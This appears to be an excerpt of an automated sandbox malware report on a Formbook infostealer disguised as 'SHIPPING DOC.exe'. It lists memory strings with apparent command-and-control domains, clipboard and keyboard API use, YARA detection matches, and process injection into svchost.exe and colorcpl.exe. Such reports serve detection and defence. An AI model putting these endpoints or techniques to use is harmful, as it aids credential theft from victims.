          Source: explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ngeribe2.homesReferer:
          Source: explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onsfskfsmpfssfpewqdsawqe.xyz
          Source: explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onsfskfsmpfssfpewqdsawqe.xyz/ge07/
          Source: explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onsfskfsmpfssfpewqdsawqe.xyz/ge07/www.g18q11a.top
          Source: explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.onsfskfsmpfssfpewqdsawqe.xyzReferer:
          Source: explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net
          Source: explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net/ge07/
          Source: explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.net/ge07/www.giyztm.xyz
          Source: explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rowadservepros.netReferer:
          Source: explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xhyx.top
          Source: explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xhyx.top/ge07/
          Source: explorer.exe, 00000008.00000003.2271387359.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077578314.000000000C561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3722125419.000000000C562000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3076167929.000000000C4EC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271236043.000000000C4E9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.xhyx.topReferer:
          Source: explorer.exe, 00000008.00000000.1280533641.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3713048612.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
          Source: explorer.exe, 00000008.00000000.1280533641.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271330735.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000008.00000003.3077610962.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000008.00000000.1280533641.0000000008DA6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000008.00000002.3713048612.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1280533641.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000008.00000000.1277736211.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.0000000007276000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
          Source: explorer.exe, 00000008.00000003.2271408637.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1280533641.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3713048612.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3077610962.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
          Source: explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: explorer.exe, 00000008.00000002.3718157848.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1284451147.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: explorer.exe, 00000008.00000002.3718157848.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1284451147.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000008.00000002.3718157848.000000000C0E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1284451147.000000000C0E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000008.00000000.1280533641.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3075660070.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3714018507.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2271408637.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
          Source: explorer.exe, 00000008.00000002.3718157848.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.1284451147.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 00000008.00000000.1277736211.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3708193539.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000008.00000002.3708193539.00000000071A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
          Source: C:\Users\user\Desktop\SHIPPING DOC.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOC.exe.2e30000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SHIPPING DOC.exe.2e30000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOC.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.3704869091.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1424810489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.3714914384.000000000945C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.3703770525.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.3704977027.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1272452503.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1425874744.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1425148603.0000000002DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: SHIPPING DOC.exe PID: 7280, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7492, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: colorcpl.exe PID: 7980, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041A320 NtCreateFile,6_2_0041A320
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041A3D0 NtReadFile,6_2_0041A3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041A450 NtClose,6_2_0041A450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041A500 NtAllocateVirtualMemory,6_2_0041A500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041A31D NtCreateFile,6_2_0041A31D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0041A44A NtClose,6_2_0041A44A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672B60 NtClose,LdrInitializeThunk,6_2_03672B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03672BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672AD0 NtReadFile,LdrInitializeThunk,6_2_03672AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672F30 NtCreateSection,LdrInitializeThunk,6_2_03672F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672FE0 NtCreateFile,LdrInitializeThunk,6_2_03672FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03672FB0 NtResumeThread,LdrInitializeThunk,6_2_03672FB0
